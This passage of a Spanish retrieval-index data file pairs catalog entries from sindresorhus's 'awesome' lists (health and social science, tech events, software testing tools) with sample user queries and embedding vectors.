science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Health and Social Science: Biomedical Information Extraction β€” How to extract information from unstructured biomedical data and text. Computational Neuroscience β€” A multidisciplinary science which uses computational approaches to study the nervous system. Diversity β€” Creating a more inclusive and diverse tech community. Digital History β€” Computer-aided scientific investigation of history. Empathy in Engineering β€” Building and promoting more compassionate engineering cultures. Healthcare β€” Open source healthcare software for facilities, providers, developers, policy experts, and researchers. Mental Health β€” Awareness and self-care in the software industry. Neuroscience β€” Study of the nervous system and brain. Digital Humanities β€” Software for humanities scholars using quantitative or computational methods. Lucid Dreams β€” A dream where one becomes aware they are dreaming. Neuroimaging β€” Software for analyzing brain data from living subjects. Transgender β€” Someone whose gender identity differs from their assigned birth sex.", "indexar": "hay alguna herramienta gratuita para analizar datos de neuroimagen o del sistema nervioso?", "v": [-0.06999, 0.05253, -0.09319, -0.20002, 0.03341, -0.10144, -0.22651, -0.02457, -0.1949, -0.0445, 0.00707, -0.09976, -0.00735, -0.0396, 0.01926, -0.00923, 0.05193, -0.05861, 0.01436, 0.14599, -0.12959, -0.10977, -0.09083, -0.00624, -0.10785, -0.04436, -0.01556, 0.02063, -0.14933, 0.2115, -0.03109, -0.02823, 0.0992, -0.15392, -0.1125, 0.08603, -0.00481, -0.0054, -0.0279, 0.03293, -0.02283, 0.0836, -0.04763, 0.02777, 0.00892, -0.02324, -0.14939, -0.02335, 0.05001, -0.05684, 0.07287, -0.02684, -0.04683, -0.04299, 0.02883, -0.14816, 0.1452, 0.00208, 0.0809, -0.09959, -0.03502, 0.04007, 0.01065, -0.01176, -0.03659, -0.03586, 0.118, -0.09944, -0.09503, 0.06835, -0.01556, 0.05642, 0.04628, 0.02544, 0.0142, 0.02368, -0.01016, 0.01375, 0.03787, 0.0145, 0.03665, 0.02404, -0.07776, 0.06009, -0.14155, -0.05014, 0.05235, -0.00165, -0.02743, -0.0249, -0.0236, 0.01754, 0.05987, 0.03664, 0.0257, 0.05898, 0.02708, -0.08031, 0.007, 0.05127, 0.11034, 0.04862, -0.14148, 0.04019, -0.0165, -0.00109, -0.00114, -0.00769, -0.07566, -0.07026, -0.01471, 0.03823, 0.00381, 0.00688, -0.07499, 0.0146, 0.0074, 0.01416, 0.03383, 0.00965, 0.05939, 0.06413, -0.03115, -0.057, -0.06243, -0.03417, -0.01738, 0.08135, 0.00165, 0.01995, -0.00063, -0.01991, -0.14776, 0.01344, -0.0841, 0.0631, -0.01655, -0.08263, -0.02414, -0.07093, -0.05662, 0.08086, -0.03767, -0.05298, -0.02095, 0.00729, -0.00403, 0.02418, -0.08278, -0.02401, -0.00051, 0.04211, 0.05914, -0.06576, 0.04969, 0.03011, 0.01356, -0.0645, -0.0401, -0.0178, -0.03435, -0.00829, 0.05223, 0.07857, -0.01983, -0.06015, -0.01411, -0.02341, 0.04071, 0.10568, -0.04947, 0.0109, 0.05119, -0.04339, 0.01554, -0.06007, -0.00836, -0.05439, -0.00799, -0.04922, 0.00267, 0.0246, 0.02378, -0.07054, -0.02832, -0.01569, -0.03669, 0.02908, -0.00315, 0.00453, 0.01645, 0.0692, -0.00329, -0.02491, 0.1292, -0.03272, -0.05044, -0.05557, 0.04508, 0.05077, -0.06935, 0.03432, 0.00525, -0.04542, -0.06031, 0.1015, 0.05789, 0.0185, 0.00964, 0.04855, -0.0294, -0.01959, 0.02466, -0.08661, -0.01798, -0.03436, -0.02032, 0.03422, -0.04103, -0.0064, 0.04083, 0.08974, 0.071, 0.08753, -0.09107, 0.01946, 0.03009, 0.0641, -0.00631, -0.03052, 0.04256, -0.00725, 0.00744, -0.0077, 0.05327, -0.045, 0.01919, -0.03423, -0.01015, -0.04679, 0.06523, 0.08377, -0.06349, -0.03123, -0.02848, -0.08931, -0.03339, -0.05518, 0.03801, -0.14414, -0.02749, -0.01164, 0.0452, -0.06645, 0.00262, -0.00545]} -{"tipo": "pregunta", "herramienta": "Health and Social Science", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Health and Social Science", "tema": "health and social science", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Health and Social Science: Biomedical Information Extraction β€” How to extract information from unstructured biomedical data and text. Computational Neuroscience β€” A multidisciplinary science which uses computational approaches to study the nervous system. Diversity β€” Creating a more inclusive and diverse tech community. Digital History β€” Computer-aided scientific investigation of history. Empathy in Engineering β€” Building and promoting more compassionate engineering cultures. Healthcare β€” Open source healthcare software for facilities, providers, developers, policy experts, and researchers. Mental Health β€” Awareness and self-care in the software industry. Neuroscience β€” Study of the nervous system and brain. Digital Humanities β€” Software for humanities scholars using quantitative or computational methods. Lucid Dreams β€” A dream where one becomes aware they are dreaming. Neuroimaging β€” Software for analyzing brain data from living subjects. Transgender β€” Someone whose gender identity differs from their assigned birth sex.", "indexar": "con quΓ© software puedo estudiar el cerebro y la funciΓ³n cerebral?", "v": [-0.05641, -0.00625, -0.05734, -0.13871, -0.09188, -0.11221, -0.11337, 0.08202, 0.00071, -0.18465, -0.09816, 0.04992, -0.12017, -0.07759, 0.01191, 0.02751, 0.0496, -0.00662, -0.0183, 0.02128, 0.00918, -0.16679, -0.04067, 0.04579, -0.02237, -0.01628, -0.0801, 0.05784, 0.04784, 0.05433, -0.00129, 0.00937, 0.18663, -0.13191, -0.01553, 0.17001, -0.05631, 0.05035, 0.03642, 0.10263, -0.09127, 0.13674, -0.06185, 0.03946, 0.09567, 0.0542, 0.02483, -0.08922, 0.04441, -0.04176, 0.03917, 0.03477, 0.05378, -0.09206, 0.05528, -0.02045, -0.08365, 0.02145, 0.05434, -0.06565, -0.03295, 0.04331, 0.02539, 0.00761, -0.03012, 0.00013, 0.12683, 0.01952, -0.022, 0.09877, -0.11119, -0.02985, 0.00032, 0.02549, 0.04417, -0.01428, -0.12876, -0.11093, 0.18474, -0.03099, -0.04053, 0.02427, -0.05368, 0.06519, 0.01195, -0.08632, 0.07403, -0.04423, 0.01167, -0.03319, -0.09174, 0.0472, 0.00528, 0.15426, -0.07477, 0.1151, 0.00938, 0.013, 0.02937, 0.04711, 0.00435, -0.03293, -0.06927, 0.14596, -0.04043, 0.01568, 0.02035, -0.06778, -0.01939, -0.03302, 0.0007, 0.08315, -0.09615, 0.03761, -0.09678, 0.04953, 0.05847, 0.01886, 0.09718, -0.00815, 0.00696, 0.02967, -0.03054, -0.05333, -0.06786, 0.03751, 0.01869, 0.15135, 0.01444, 0.07101, 0.0113, -0.02712, -0.028, -0.1125, -0.06966, 0.07107, 0.01858, -0.04463, 0.03234, 0.00363, 0.00323, 0.00433, -0.03878, 0.0096, -0.05112, 0.00131, 0.03038, 0.0157, -0.01984, 0.00217, 0.05695, -0.00167, 0.07887, -0.07785, 0.00071, -0.02486, 0.04941, -0.02077, 0.01297, 0.00017, -0.09995, 0.06854, 0.00211, 0.0395, -0.0161, -0.04869, -0.05432, 0.01438, 0.02405, 0.17198, -0.07051, -0.02101, 0.02556, -0.05211, -0.03283, -0.02411, -0.00811, 0.062, 0.01774, -0.03807, -0.01618, 0.06158, -0.01706, -0.05508, -0.02861, -0.03942, -0.05259, -0.01968, -0.01575, -0.05749, -0.08272, 0.039, -0.00596, -0.04015, 0.16026, -0.0021, -0.09657, 0.02481, 0.03442, 0.05726, 0.00857, 0.04714, 0.00038, -0.00821, -0.0968, 0.01913, 0.04746, 0.04004, -0.02193, 0.1042, -0.08604, -0.11355, 0.04104, 0.03016, -0.02531, 0.00124, 0.01604, 0.02003, -0.0056, 0.03557, 0.03568, -0.02402, 0.03587, 0.08875, -0.08173, -0.0027, 0.04561, 0.10013, 0.02485, 0.0428, 0.02417, -0.01206, 0.02982, -0.02591, 0.05146, 0.02605, -0.06502, -0.00272, 0.04797, -0.00167, -0.0127, 0.051, 0.01268, -0.03752, -0.01614, -0.03245, -0.05194, -0.03794, 0.04555, -0.07984, -0.09157, -0.00049, 0.04305, -0.04762, 0.02582, 0.00958]} -{"tipo": "pregunta", "herramienta": "Events", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Events", "tema": "events", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Events: Creative Tech Events β€” Events around the globe for creative coding, tech, design, music, arts and cool stuff. Events in Italy β€” Tech-related events in Italy. Events in the Netherlands β€” Tech-related events in the Netherlands.", "indexar": "ΒΏdΓ³nde puedo encontrar eventos de programaciΓ³n creativa en Italia?", "v": [-0.13225, 0.00496, -0.14528, -0.06917, 0.01443, -0.00921, 0.07421, -0.03915, -0.14167, -0.0807, 0.03003, -0.02852, 0.04477, -0.15694, -0.06876, 0.06582, 0.1739, -0.00558, 0.11886, -0.12129, -0.12501, -0.07481, -0.09355, -0.08494, -0.01003, -0.16527, 0.02491, 0.15493, 0.00518, -0.05368, 0.03, 0.01798, 0.10354, -0.04246, -0.05433, -0.08827, 0.07647, -0.00296, -0.03993, -0.07158, 0.02317, -0.04986, -0.00603, -0.03959, 0.00486, 0.04457, 0.06122, 0.04049, -0.17744, -0.02214, -0.00202, 0.05414, 0.07589, -0.03317, 0.07136, -0.09423, -0.03252, -0.1103, -0.06947, -0.00681, 0.04276, 0.01098, -0.00433, 0.01091, 0.02855, 0.13044, -0.04337, -0.04335, -0.01266, 0.02, -0.05235, -0.00466, -0.11694, 0.00827, 0.11463, 0.02489, -0.0218, -0.05261, -0.04976, 0.00823, -0.05649, 0.03828, 0.03344, 0.02155, -0.03069, 0.04455, 0.03243, -0.07548, -0.1163, -0.0517, 0.06364, 0.05393, 0.0435, -0.00409, -0.06377, -0.0363, 0.10301, 0.03192, 0.01191, 0.06822, -0.11855, -0.10102, -0.06506, 0.03399, -0.03008, 0.04899, 0.05911, 0.08187, 0.08725, 0.0464, -0.03569, -0.02094, -0.08477, -0.03771, -0.11191, 0.08627, 0.09225, -0.08432, 0.08484, 0.03363, -0.00492, 0.12933, 0.08318, -0.01828, 0.07363, 0.13415, 0.01942, 0.17083, -0.02095, 0.05725, 0.0792, -0.05956, 0.01418, 0.00202, -0.00297, -0.00261, 0.01935, 0.00041, 0.10029, 0.00189, -0.00879, -0.02812, 0.003, 0.05416, 0.02123, 0.01679, 0.03918, -0.05833, 0.00759, 0.03264, -0.01924, 0.00378, 0.00861, 0.03967, -0.08527, 0.02355, -0.03969, -0.03409, -0.03593, 0.03086, -0.12511, 0.08113, -0.04798, 0.00751, 0.02885, 0.03448, -0.03335, 0.01996, 0.0267, 0.09789, -0.07549, 0.09805, 0.03935, -0.17868, -0.01348, -0.02758, 0.0188, -0.14287, -0.09332, -0.07979, -0.01506, 0.02632, -0.03376, -0.07733, 0.07269, -0.04075, 0.0934, 0.01822, 0.02754, 0.07151, -0.00642, 0.06699, -0.01136, -0.03102, -0.07511, 0.0011, -0.00395, -0.00084, -0.03478, -0.06917, -0.01474, 0.03111, -0.01729, 0.00756, 0.02756, 0.0052, -0.07344, 0.04545, -0.03452, 0.04315, -0.00039, -0.02887, 0.05906, -0.04196, -0.04927, 0.04534, -0.01593, 0.0019, 0.06618, -0.03304, -0.01643, -0.03398, -0.00131, -0.01993, 0.07552, -0.09517, 0.02734, -0.05625, 0.03492, 0.07478, -0.01877, 0.04643, -0.00127, -0.00889, 0.02236, -0.05161, 0.00057, 0.00846, 0.00693, -0.01128, -0.01325, 0.01743, 0.00371, -0.00743, -0.02026, -0.02501, -0.06506, 0.01426, -0.06675, -0.0288, -0.03448, 0.01749, 0.04242, -0.05808, 0.05139, 0.00384]} -{"tipo": "pregunta", "herramienta": "Events", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Events", "tema": "events", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Events: Creative Tech Events β€” Events around the globe for creative coding, tech, design, music, arts and cool stuff. Events in Italy β€” Tech-related events in Italy. Events in the Netherlands β€” Tech-related events in the Netherlands.", "indexar": "ΒΏcon quΓ© sitio puedo buscar conferencias de tecnologΓ­a y diseΓ±o en Holanda?", "v": [0.04965, -0.01996, -0.06735, -0.10009, 0.04692, -0.08459, -0.00526, -0.05637, -0.04952, -0.0433, -0.18342, -0.06525, -0.07862, -0.02786, 0.0477, 0.10989, 0.17558, -0.14739, 0.06989, -0.07127, -0.06801, 0.02652, -0.14486, -0.08506, 0.04826, -0.15676, 0.05014, -0.088, -0.11357, -0.01233, 0.08402, -0.08267, 0.04339, 0.14123, -0.13459, -0.03206, 0.09127, 0.04649, 0.00249, -0.03771, -0.09016, 0.02955, 0.02895, -0.07364, 0.04021, 0.02501, -0.12239, 0.00593, -0.07884, 0.01431, -0.04079, 0.00731, -0.09965, 0.12019, 0.05801, 0.0248, 0.12272, 0.02964, 0.0977, -0.10472, 0.02269, 0.03188, -0.0167, 0.03658, 0.01301, 0.01677, -0.02424, -0.03361, -0.05884, -0.02615, -0.06407, -0.15006, 0.03927, -0.05636, 0.1471, 0.05388, -0.06868, 0.06419, 0.02234, -0.01451, -0.03007, 0.02747, -0.11449, -0.03429, -0.0774, 0.02548, 0.02736, 0.01993, -0.03837, -0.08305, 0.05971, 0.10202, 0.05388, -0.10579, -0.06494, -0.07652, 0.08799, 0.00237, 0.06591, 0.00281, -0.01656, 0.04275, -0.05185, 0.03265, -0.0229, 0.07658, 0.08637, -0.10409, 0.00993, -0.09623, -0.01981, -0.06899, -0.10419, -0.02337, -0.09168, -0.04083, 0.10622, -0.01816, 0.01714, 0.00032, -0.02666, 0.03056, 0.00978, -0.04662, 0.01484, 0.01012, -0.09909, 0.06583, 0.02528, -0.01345, 0.05172, -0.06313, -0.05645, 0.00778, 0.11103, 0.06148, 0.00054, -0.03047, 0.05614, -0.08695, 0.03428, 0.06459, -0.04567, -0.07105, -0.004, 0.00863, 0.07371, -0.01556, -0.07172, -0.08172, -0.01927, 0.09979, 0.06787, 0.03842, -0.04445, 0.00132, -0.05739, -0.06624, -0.02082, 0.15837, -0.08913, 0.01826, -0.02018, -0.07679, -0.01159, 0.03543, -0.0002, -0.00556, -0.006, 0.09306, -0.02273, 0.02507, -0.00294, -0.10263, -0.03509, 0.00338, 0.02732, -0.06586, -0.00281, -0.14169, -0.04058, 0.02103, -0.09794, -0.05009, -0.02735, 0.01608, 0.03372, 0.01643, 0.0539, 0.02564, 0.05244, 0.02049, -0.02102, 0.03593, -0.00881, 0.01313, 0.02598, -0.03113, -0.05564, -0.04569, -0.06136, -0.0267, -0.00762, -0.00136, -0.00159, 0.03777, -0.03285, -0.00447, -0.05545, 0.02616, -0.00903, 0.02691, 0.06626, -0.03693, -0.08631, -0.04174, 0.03375, -0.03799, -0.05966, 0.07069, 0.07046, 0.05726, -0.0274, 0.00146, 0.0541, 0.02065, 0.02562, -0.02724, -0.02858, -0.03452, 0.03568, 0.01446, -0.00659, -0.01122, 0.05963, 0.07195, -0.01248, 0.03462, -0.10476, -0.03291, -0.0569, 0.02482, 0.01413, -0.02519, 0.0206, -0.06359, -0.10579, 0.0666, -0.02037, -0.02707, -0.03317, 0.06948, 0.01683, -0.08235, 0.04006, 0.03227]} -{"tipo": "pregunta", "herramienta": "Events", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Events", "tema": "events", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Events: Creative Tech Events β€” Events around the globe for creative coding, tech, design, music, arts and cool stuff. Events in Italy β€” Tech-related events in Italy. Events in the Netherlands β€” Tech-related events in the Netherlands.", "indexar": "hay alguna plataforma para descubrir agendadores de eventos globales sobre arte y mΓΊsica?", "v": [-0.02983, 0.04318, -0.08045, -0.12861, -0.05231, -0.05074, -0.05881, -0.07666, -0.11522, -0.17897, -0.07572, -0.06424, -0.08148, 0.0914, 0.1023, 0.05289, 0.11291, -0.0767, 0.03917, -0.06848, -0.08944, 0.03243, -0.13893, -0.15135, -0.07127, -0.28288, 0.11149, 0.00075, -0.02422, -0.02576, 0.01412, -0.0313, -0.01572, -0.07029, -0.08473, -0.1629, 0.05296, 0.02733, -0.04817, -0.10832, -0.16648, -0.08128, 0.00076, 0.0283, 0.03388, -0.09479, -0.02259, 0.02655, -0.02377, 0.00131, 0.00866, 0.10095, -0.11177, 0.06606, 0.0707, -0.06693, -0.01467, -0.08204, -0.08506, -0.07207, -0.04349, -0.00899, -0.1416, -0.03553, 0.04532, 0.04899, 0.06455, 0.07723, 0.03379, 0.14321, -0.03921, -0.0196, 0.14534, 0.0383, 0.03942, -0.00393, 0.00534, -0.04918, -0.15112, -0.02768, 0.00787, 0.06706, -0.01237, 0.09215, -0.0679, -0.06259, 0.13355, -0.12675, -0.09876, -0.01571, -0.02945, 0.07545, -0.04783, -0.01967, -0.02907, -0.04067, 0.00657, -0.03662, -0.012, 0.01748, -0.01326, -0.05179, -0.02754, -0.08425, -0.08186, 0.0714, 0.02799, -0.02834, 0.08065, 0.07253, -0.06255, 0.10538, -0.01897, 0.02652, -0.00899, -0.01986, -0.01367, -0.03124, 0.0486, 0.03381, -0.02202, 0.08005, 0.00348, -0.05602, 0.04159, 0.02996, -0.06679, 0.11514, 0.08815, 0.01313, 0.00641, -0.0665, -0.00614, 0.02217, 0.01887, -0.09475, 0.04461, -0.03456, 0.08268, 0.03828, 0.07967, 0.07611, 0.01823, -0.04075, 0.10135, -0.03057, 0.01501, -0.06414, -0.04168, 0.09418, -0.10691, 0.08826, -0.04595, 0.00644, -0.03339, -0.02788, -0.01514, -0.0282, -0.01157, -0.03436, -0.07724, 0.05102, 0.01086, 0.02797, -0.04041, -0.02295, 0.0128, 0.05758, -0.01761, 0.05036, -0.01164, 0.04582, 0.06742, -0.10605, -0.04288, -0.04396, -0.05939, -0.0885, 0.09728, -0.01098, -0.03908, 0.0139, -0.02732, -0.00089, 0.0021, -0.04093, 0.08332, -0.01125, -0.04863, 0.044, -0.01992, 0.04989, -0.04632, 0.03462, 0.03659, 0.00457, -0.02802, 0.03837, -0.09739, 0.03975, -0.04603, -0.05716, 0.02697, -0.02466, 0.06709, 0.02142, -0.0036, 0.00173, 0.04959, -0.03665, 0.0006, -0.0217, 0.01601, -0.04085, -0.0042, 0.02932, -0.0348, -0.00837, 0.04501, 0.04019, -0.07775, 0.03688, 0.01841, 0.01055, -0.00126, 0.03167, 0.04366, -0.04295, 0.06213, -0.0176, 0.03326, 0.00543, 0.00404, 0.02518, -0.01664, 0.03027, 0.00533, -0.01166, -0.03164, 0.02118, -0.0207, 0.01799, 0.0689, -0.00975, 0.02453, -0.0061, -0.0172, 0.00082, 0.00768, -0.05834, -0.0071, -0.01792, 0.08872, 0.0217, 0.02279, 0.03433]} -{"tipo": "pregunta", "herramienta": "Testing", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Testing", "tema": "testing", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Testing: Testing β€” Software testing. Visual Regression Testing β€” Ensures changes did not break the functionality or style. Selenium β€” Open-source browser automation framework and ecosystem. Appium β€” Test automation tool for apps. TAP β€” Test Anything Protocol. JMeter β€” Load testing and performance measurement tool. k6 β€” Open-source, developer-centric performance monitoring and load testing solution. Playwright β€” Node.js library to automate Chromium, Firefox and WebKit with a single API. Quality Assurance Roadmap β€” How to start & build a career in software testing. Gatling β€” Open-source load and performance testing framework based on Scala, Akka, and Netty. CodeRabbit β€” AI-powered code review platform.", "indexar": "con que puedo automatizar pruebas de rendimiento para mi aplicaciΓ³n web?", "v": [-0.08486, 0.13872, -0.17329, -0.30978, 0.07977, 0.03206, -0.12713, 0.01519, -0.09006, 0.00305, -0.05001, -0.11821, -0.01654, 0.02532, 0.02607, 0.02428, -0.01407, -0.10528, -0.01958, 0.03236, 0.05296, -0.0842, -0.13414, -0.12837, 0.00638, 0.21098, 0.03377, 0.08772, -0.155, -0.11717, -0.07741, 0.05588, 0.07214, -0.02164, -0.03419, -0.01684, 0.01917, 0.08478, 0.0664, 0.06815, 0.03298, -0.00975, -0.04643, -0.02096, 0.1313, 0.08728, 0.0533, -0.00708, -0.05447, -0.11089, -0.00523, -0.14973, 0.04272, -0.03755, -0.07444, -0.06362, 0.08954, -0.11254, 0.13562, -0.0384, 0.02236, -0.07256, -0.05643, 0.02713, 0.06088, -0.02522, 0.07645, 0.07618, -0.06681, 0.09146, 0.04249, 0.08977, -0.03132, -0.02624, 0.01257, 0.0798, -0.04881, 0.03784, -0.00908, 0.01054, -0.01171, -0.02743, -0.06534, 0.07212, -0.0554, -0.04354, -0.00855, -0.09789, 0.17303, 0.00602, -0.01703, -0.0198, -0.03473, 0.04128, -0.01866, -0.0492, 0.11612, -0.07165, 0.03892, -0.04306, 0.03637, -0.02303, -0.06241, 0.01909, -0.03343, 0.0099, 0.05857, -0.00212, -0.08827, -0.04063, 0.04976, -0.12584, -0.0955, 0.03109, -0.06634, 0.06263, -0.03376, -0.02615, -0.05024, -0.09258, -0.05476, -0.00838, -0.02858, -0.08312, 0.01846, -0.03086, 0.06684, 0.08099, -0.01091, 0.01967, 0.07262, 0.00852, -0.12114, -0.02408, 0.02765, 0.06307, -0.03744, -0.02174, -0.02484, 0.01996, -0.01137, 0.01781, -0.03348, -0.01281, 0.07687, -0.03338, -0.07455, 0.00788, -0.02644, 0.00647, -0.00078, -0.09307, -0.01011, -0.00545, -0.1409, -0.01216, 0.0612, 0.0087, 0.01367, -0.02744, -0.03556, -0.00683, -0.06478, 0.04073, -0.00125, 0.06938, 0.01787, 0.00114, -0.00622, 0.04758, -0.00146, 0.05878, 0.00028, -0.11501, 0.07824, 0.05389, 0.02803, 0.02612, -0.00593, -0.0317, -0.00749, -0.03616, 0.01392, -0.03488, 0.04973, -0.03958, 0.04834, -0.01053, 0.03481, 0.0176, 0.00744, 0.04564, 0.00623, -0.01083, 0.0943, 0.0173, 0.02063, -0.05363, -0.04905, -0.07345, -0.06712, -0.07768, -0.06002, -0.01447, 0.00197, 0.09662, 0.04293, 0.01856, 0.00302, -0.00251, 0.0049, 0.05604, 0.10185, -0.01303, -0.03346, -0.024, 0.07951, -0.01117, -0.03887, -0.03299, -0.02537, -0.03509, -0.00845, 0.02977, -0.00826, 0.05004, 0.02826, -0.0163, 0.00651, -0.0482, -0.02977, 0.01232, -0.00913, -0.01216, 0.00184, -0.01439, -0.01594, -0.0205, -0.04993, -0.0861, -0.06939, 0.04148, 0.06132, -0.02835, -0.05346, -0.02916, -0.0564, -0.0572, -0.02298, -0.04387, -0.03409, -0.01949, 0.02744, -0.03928, 0.04566, 0.04477]} -{"tipo": "pregunta", "herramienta": "Testing", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Testing", "tema": "testing", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Testing: Testing β€” Software testing. Visual Regression Testing β€” Ensures changes did not break the functionality or style. Selenium β€” Open-source browser automation framework and ecosystem. Appium β€” Test automation tool for apps. TAP β€” Test Anything Protocol. JMeter β€” Load testing and performance measurement tool. k6 β€” Open-source, developer-centric performance monitoring and load testing solution. Playwright β€” Node.js library to automate Chromium, Firefox and WebKit with a single API. Quality Assurance Roadmap β€” How to start & build a career in software testing. Gatling β€” Open-source load and performance testing framework based on Scala, Akka, and Netty. CodeRabbit β€” AI-powered code review platform.", "indexar": "existe una alternativa libre a Selenium para automatizaciΓ³n de navegadores?", "v": [0.02584, -0.04339, -0.11675, -0.08498, -0.09594, -0.01943, -0.09365, -0.15518, -0.21382, -0.0401, -0.04884, -0.19977, -0.03215, 0.00911, 0.10109, 0.0397, 0.03704, -0.14152, 0.10671, 0.08407, -0.02867, 0.01706, -0.12242, -0.06575, 0.01398, -0.0528, -0.00625, 0.02573, -0.03574, -0.00748, -0.06095, -0.05384, 0.13063, -0.05064, -0.02726, -0.01093, 0.11822, -0.01576, 0.07619, -0.02428, 0.03242, 0.00564, -0.02365, 0.09879, -0.10082, 0.05309, -0.06484, -0.10347, 0.00629, -0.05834, 0.0448, 0.03744, -0.11504, -0.01254, 0.05201, -0.04788, 0.24, -0.08662, -0.08257, -0.08258, 0.04449, 0.02605, 0.10545, 0.00216, 0.0013, 0.05056, -0.03982, 0.02406, -0.00235, 0.16539, 0.12704, -0.04109, -0.01139, 0.033, -0.00566, 0.16612, -0.0088, 0.03545, 0.02606, 0.08087, 0.07716, -0.02405, -0.06782, 0.01015, -0.01134, -0.1543, 0.02517, -0.05599, -0.00627, -0.01563, 0.03836, 0.09555, 0.04012, 0.0791, 0.02672, -0.08013, 0.0211, -0.0085, -0.02675, 0.07332, 0.05373, -0.00913, -0.02171, 0.09049, 0.04823, -0.03384, 0.04127, -0.04157, -0.03007, 0.0054, 0.0351, 0.04002, -0.03008, -0.02216, -0.03809, 0.00533, 0.03466, 0.00994, -0.05425, -0.10706, -0.05374, -0.01339, -0.06994, -0.11299, 0.00695, 0.05071, -0.00018, 0.07322, -0.06617, -0.09146, 0.14693, -0.07157, -0.12056, -0.09531, -0.10425, 0.06572, 0.04804, -0.05851, 0.02776, 0.01696, -0.0238, 0.00893, -0.03548, -0.02383, 0.06639, -0.01142, 0.01086, -0.00616, 0.02015, -0.05709, -0.0421, -0.11981, 0.01071, 0.02853, -0.01942, 0.04533, -0.06506, 0.02837, -0.04048, 0.10312, 0.02897, -0.02364, 0.01148, 0.03446, -0.0656, 0.0007, 0.01649, -0.02526, -0.04489, 0.01806, 0.03987, 0.11994, 0.07306, -0.1212, 0.00926, -0.00996, -0.02157, -0.0257, 0.03481, -0.0545, 0.09895, -0.04002, -0.03929, -0.05959, -0.0381, -0.05209, -0.00781, 0.00322, -0.02698, 0.01501, -0.07119, -0.01013, -0.12585, -0.0209, 0.08442, 0.07708, 0.04158, -0.05026, -0.03228, -0.03133, -0.01023, -0.01076, 0.0474, -0.04502, -0.04317, 0.06665, 0.0056, -0.00418, 0.04547, 0.0195, 0.01573, 0.01299, 0.05556, 0.01503, 0.02913, 0.0148, 0.01306, -0.03379, -0.00593, -0.07157, -0.01201, -0.08579, -0.02549, 0.06868, 0.03251, 0.0667, 0.02673, 0.04085, -0.03839, -0.01543, 0.04317, -0.02602, 0.00956, 0.01043, -0.00153, 0.00236, -0.05055, -0.008, 0.01658, 0.0409, -0.01917, 0.00626, 0.00104, 0.01803, -0.06043, -0.00297, -0.06347, -0.10466, -0.0338, -0.01007, -0.06712, 0.05471, -0.0369, 0.03365, 0.00397, 0.03656]} -{"tipo": "pregunta", "herramienta": "Testing", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Testing", "tema": "testing", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Testing: Testing β€” Software testing. Visual Regression Testing β€” Ensures changes did not break the functionality or style. Selenium β€” Open-source browser automation framework and ecosystem. Appium β€” Test automation tool for apps. TAP β€” Test Anything Protocol. JMeter β€” Load testing and performance measurement tool. k6 β€” Open-source, developer-centric performance monitoring and load testing solution. Playwright β€” Node.js library to automate Chromium, Firefox and WebKit with a single API. Quality Assurance Roadmap β€” How to start & build a career in software testing. Gatling β€” Open-source load and performance testing framework based on Scala, Akka, and Netty. CodeRabbit β€” AI-powered code review platform.", "indexar": "que herramienta sirve para asegurar que los cambios visuales no rompan la funcionalidad de mis apps?", "v": [0.06271, 0.10109, -0.23596, -0.14808, 0.07333, -0.05984, -0.07795, -0.03822, 0.02187, -0.08359, 0.00874, -0.17056, -0.03728, 0.00181, 0.10788, 0.06134, 0.02861, -0.2003, -0.04478, 0.14796, 0.00024, -0.05039, -0.08739, -0.07588, -0.11388, 0.10234, 0.0308, -0.06653, -0.15259, 0.01528, 0.01794, 0.02117, 0.13287, -0.07794, -0.12117, -0.11402, -0.03262, -0.03384, 0.00046, 0.05176, 0.00839, 0.03253, -0.06281, 0.04927, -0.0535, -0.01572, -0.05307, 0.08545, -0.05436, 0.07269, -0.03971, -0.01659, -0.07681, 0.09206, 0.06824, -0.14283, 0.19562, -0.13525, 0.03211, -0.05426, -0.07407, 0.05559, -0.00531, 0.05105, 0.06697, -0.04895, -0.00225, -0.02691, -0.06256, 0.08876, -0.09111, 0.04278, 0.01257, 0.06261, 0.00194, 0.02737, -0.054, -0.0499, -0.01665, 0.0224, 0.08698, 0.00821, -0.15352, 0.0623, -0.04732, -0.07922, 0.09773, 0.03578, -0.01194, -0.09552, -0.00617, 0.10179, -0.01947, 0.02931, -0.02908, 0.02354, 0.05299, -0.05458, 0.02327, 0.09542, 0.11629, -0.08445, -0.05579, 0.03453, -0.06763, -0.01478, 0.08351, 0.01912, 0.00468, -0.05483, 0.05789, -0.04226, 0.00481, 0.06692, -0.03762, 0.08624, -0.03975, -0.09137, -0.01933, -0.04162, 0.03202, -0.01509, -0.02578, -0.03969, 0.02091, -0.01263, -0.03481, 0.11388, 0.02526, 0.04836, -0.05863, -0.05983, -0.06155, 0.04954, -0.10854, -0.0457, 0.03123, -0.07241, 0.02351, -0.05361, 0.02628, 0.00251, 0.05816, -0.04359, 0.03643, 0.02239, 0.01572, -0.01008, -0.04306, 0.05361, 0.05419, -0.01041, -0.05801, 0.05892, -0.01843, 0.06071, -0.09422, -0.056, -0.05871, 0.03223, -0.04784, -0.03194, -0.03412, -0.01552, -0.0027, -0.07063, 0.03334, 0.01346, 0.16894, 0.0402, -0.01636, 0.02578, 0.01976, -0.03374, -0.04367, 0.00585, -0.04251, 0.03182, 0.02787, -0.05936, -0.05395, 0.00883, -0.04818, -0.02394, 0.01981, -0.06207, -0.05528, -0.03544, -0.00164, -0.00627, -0.03049, 0.06396, 0.01265, -0.05676, 0.04822, -0.04362, -0.04519, -0.03796, 0.01702, -0.02248, -0.05198, 